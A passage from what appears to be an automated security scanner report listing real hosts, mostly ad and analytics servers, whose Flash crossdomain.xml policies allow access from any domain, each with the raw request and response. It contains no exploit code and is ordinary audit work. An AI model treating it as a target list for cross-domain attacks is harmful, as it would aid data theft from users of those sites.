Expires: Mon, 25 Apr 2011 12:37:02 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 24 Apr 2011 12:37:02 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.43. http://feeds.delicious.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.delicious.com

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 19:48:44 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Mar 2011 16:19:33 GMT
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.44. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 24 Apr 2011 00:37:13 GMT
Expires: Thu, 21 Apr 2011 00:36:18 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 41556
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.45. http://gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 17:07:15 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.46. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2a53"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web201
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:47:18 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

7.47. http://i.xx.openx.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.xx.openx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.xx.openx.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 16 Mar 2011 18:23:50 GMT
ETag: "1b9a5-d7-49e9da577f980"
Accept-Ranges: bytes
Content-Length: 215
Content-Type: text/xml
Date: Sun, 24 Apr 2011 15:19:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-
...[SNIP]...

7.48. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:13:18 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.49. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Mar 2011 22:34:09 GMT
Accept-Ranges: bytes
ETag: "f2db35f1e0ddcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 00:52:55 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.50. http://img.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:21:26 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.51. http://img1.wsimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:da7"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:06 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.52. http://img3.wsimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:da7"
Server: Microsoft-IIS/6.0
Cache-Control: max-age=3888000
Date: Sun, 24 Apr 2011 12:42:04 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.53. http://l.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=71b0f43c-2ddc-4015-9c37-df0d3071745e; path=/; expires=Tue, 23 Apr 2013 15:20:24 GMT
Content-Type: text/xml
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 212

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-do
...[SNIP]...

7.54. http://leads.demandbase.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://leads.demandbase.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: leads.demandbase.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:18 GMT
Server: Apache
Last-Modified: Thu, 28 Jun 2007 14:35:20 GMT
ETag: "958da1-c9-433f845a21a00"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.55. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:21:04 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.56. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.57. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:16:39 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19982
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.58. http://metrics.citibank.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.citibank.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:09 GMT
Server: Omniture DC/2.0.0
xserver: www309
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.59. http://microsoftsto.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://microsoftsto.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: microsoftsto.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:53:07 GMT
Server: Omniture DC/2.0.0
xserver: www148
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

7.60. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:47:22 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

7.61. http://o.swisscom.ch/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.swisscom.ch
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.swisscom.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:53 GMT
Server: Omniture DC/2.0.0
xserver: www90
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.62. http://omni.pcworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omni.pcworld.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:50:54 GMT
Server: Omniture DC/2.0.0
xserver: www297
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.63. http://oracleglobal.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oracleglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:45:42 GMT
Server: Omniture DC/2.0.0
xserver: www661
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.64. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012459000"
Last-Modified: Fri, 18 Feb 2011 07:00:59 GMT
Content-Type: application/xml
Content-Length: 211
Date: Sun, 24 Apr 2011 16:35:03 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

7.65. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 25 Apr 2011 15:20:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Sun, 24 Apr 2011 15:20:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.66. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 24 Apr 2011 15:23:11 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 24 Apr 2011 15:23:11 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

7.67. http://roia.biz/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://roia.biz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: roia.biz

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 03:22:22 GMT
Content-Type: text/x-cross-domain-policy
Content-Length: 175
Last-Modified: Tue, 25 Nov 2008 04:11:55 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="by-content-type"/>
   <allow-access-from domain="*" />
</cross-domain-policy>


7.68. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 23 Apr 2011 21:09:03 GMT
Expires: Thu, 21 Apr 2011 21:08:15 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 55682
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.69. http://s1.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 23 Apr 2011 21:19:16 GMT
Expires: Sun, 24 Apr 2011 21:19:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 64859

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.70. http://search.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:14:04 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:04:30 GMT
Cache-Control: max-age=1800
Expires: Sun, 24 Apr 2011 20:44:04 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 358515046
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aba-35-sr4.prod.twitter.com
X-Cache: MISS
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.71. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:49:06 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Sun, 01 May 2011 19:49:06 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

7.72. http://sensic.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sensic.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sensic.net

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:50 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 07:57:02 GMT
ETag: "b365aa-d1-4a154f84d8f80"
Accept-Ranges: bytes
Content-Length: 209
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

7.73. http://smetrics.freecreditreport.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smetrics.freecreditreport.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
